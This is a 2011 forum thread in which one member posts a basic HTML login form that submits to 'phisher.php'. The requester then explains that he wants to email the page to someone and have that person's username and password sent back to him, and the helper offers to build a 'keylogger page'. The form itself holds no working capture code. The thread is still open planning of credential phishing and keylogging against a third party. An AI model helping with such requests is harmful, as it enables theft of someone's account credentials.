Author Topic: Need a basic web page  (Read 4334 times)

A12danrulz

  • Leader
  • Hero Member
  • *****
  • Posts: 4018
  • Reputation: 216
  • Badges:
Re: Need a basic web page
« Reply #15 on: August 13, 2011, 05:06:54 pm »
Thank you.

Winning

  • Hero Member
  • *****
  • Posts: 1632
  • Reputation: 26
  • I think I saw this in a movie
  • Computers: Toshiba Thrive Tablet
  • iDevices: iPod touch 4G
Re: Need a basic web page
« Reply #16 on: August 13, 2011, 05:33:36 pm »
Here is how to make one just copy and paste it in a text editor (I use notepad)

Code: [Select]
<html>
<head>
<script type="text/javascript"><!--
function confirm(form) {
    if(form.username.value == "") {
        alert("Error: no username entered.");
        return false;
    }
    if(form.password.value == "") {
        alert("Error: no password entered.");
        return false;
    }
    return true;
}
//--></script>
</head>
<body>
<div>
<form action="phisher.php" method="post" onsubmit="confirm(this);">
    <label for="username">Username: </label>
    <input name="username" type="text" value="" />
    <br />
    <label for="password">Password: </label>
    <input name="password" type="password" value="" />
    <br />
    <br />
    <input type="submit" value="Login" />
</form>
</div>
</body>
</html>

Winning

  • Hero Member
  • *****
  • Posts: 1632
  • Reputation: 26
  • I think I saw this in a movie
  • Computers: Toshiba Thrive Tablet
  • iDevices: iPod touch 4G
Re: Need a basic web page
« Reply #17 on: August 13, 2011, 08:20:11 pm »
Is that what you were looking for?

A12danrulz

  • Leader
  • Hero Member
  • *****
  • Posts: 4018
  • Reputation: 216
  • Badges:
Re: Need a basic web page
« Reply #18 on: August 13, 2011, 08:22:20 pm »
How would I make it either A) Write the information to a file or B) Send the information to me?

Winning

  • Hero Member
  • *****
  • Posts: 1632
  • Reputation: 26
  • I think I saw this in a movie
  • Computers: Toshiba Thrive Tablet
  • iDevices: iPod touch 4G
Re: Need a basic web page
« Reply #19 on: August 13, 2011, 08:24:36 pm »
??? Copy and paste it? Or email it to yourself with a .htm at the end. Srry not really comprehending what your saying.

Don't like seeing ads? Click here to register!

A12danrulz

  • Leader
  • Hero Member
  • *****
  • Posts: 4018
  • Reputation: 216
  • Badges:
Re: Need a basic web page
« Reply #20 on: August 13, 2011, 08:29:29 pm »
If I email this to someones gmail how would it send the stuff to my computer or some other server? Or could it actually send it to my email account by email?

Winning

  • Hero Member
  • *****
  • Posts: 1632
  • Reputation: 26
  • I think I saw this in a movie
  • Computers: Toshiba Thrive Tablet
  • iDevices: iPod touch 4G
Re: Need a basic web page
« Reply #21 on: August 13, 2011, 08:30:37 pm »
Yeah just go on your gmail and in the to category just put your email again.

A12danrulz

  • Leader
  • Hero Member
  • *****
  • Posts: 4018
  • Reputation: 216
  • Badges:
Re: Need a basic web page
« Reply #22 on: August 13, 2011, 08:38:57 pm »
No I mean I am going to send this to someone. How would the script send me the username and password from their computer to mine?

Winning

  • Hero Member
  • *****
  • Posts: 1632
  • Reputation: 26
  • I think I saw this in a movie
  • Computers: Toshiba Thrive Tablet
  • iDevices: iPod touch 4G
Re: Need a basic web page
« Reply #23 on: August 13, 2011, 08:47:41 pm »
No idea. You would have to have him him enter it on your comp. I don't think it is possible unless it is on your computer. And that script doesnt save passwords. It is just a standard login page. I can make it a keylogger page but you would have to give me a litte bit of time (a few hours.)

A12danrulz

  • Leader
  • Hero Member
  • *****
  • Posts: 4018
  • Reputation: 216
  • Badges:
Re: Need a basic web page
« Reply #24 on: August 13, 2011, 08:49:00 pm »
Yeah I've got all the time in the world.

Don't like seeing ads? Click here to register!

Winning

  • Hero Member
  • *****
  • Posts: 1632
  • Reputation: 26
  • I think I saw this in a movie
  • Computers: Toshiba Thrive Tablet
  • iDevices: iPod touch 4G
Re: Need a basic web page
« Reply #25 on: August 13, 2011, 09:00:49 pm »
K I'll get on it later. Running early tomorrow got to get to bed.

A12danrulz

  • Leader
  • Hero Member
  • *****
  • Posts: 4018
  • Reputation: 216
  • Badges:
Re: Need a basic web page
« Reply #26 on: August 13, 2011, 09:02:04 pm »
Ok. I just found something that could be VERY useful indeed. Do you know JS?

Winning

  • Hero Member
  • *****
  • Posts: 1632
  • Reputation: 26
  • I think I saw this in a movie
  • Computers: Toshiba Thrive Tablet
  • iDevices: iPod touch 4G
Re: Need a basic web page
« Reply #27 on: August 13, 2011, 09:07:51 pm »
I get by

Trcx528

  • Haxor
  • Hero Member
  • *****
  • Posts: 4502
  • Reputation: 166
  • Google it!
    • iNinjas
  • Badges:
  • Computers: 13" 2011 Macbook Pro, 120 GB SSD and 16 GB of Ram
  • iDevices: None
Re: Need a basic web page
« Reply #28 on: August 13, 2011, 09:19:38 pm »
I think that he want the results of the form written to a file. 

Winning

  • Hero Member
  • *****
  • Posts: 1632
  • Reputation: 26
  • I think I saw this in a movie
  • Computers: Toshiba Thrive Tablet
  • iDevices: iPod touch 4G
Re: Need a basic web page
« Reply #29 on: August 13, 2011, 09:21:50 pm »
Oh... Err ... Let me tackle this in the morning. I can't think straight.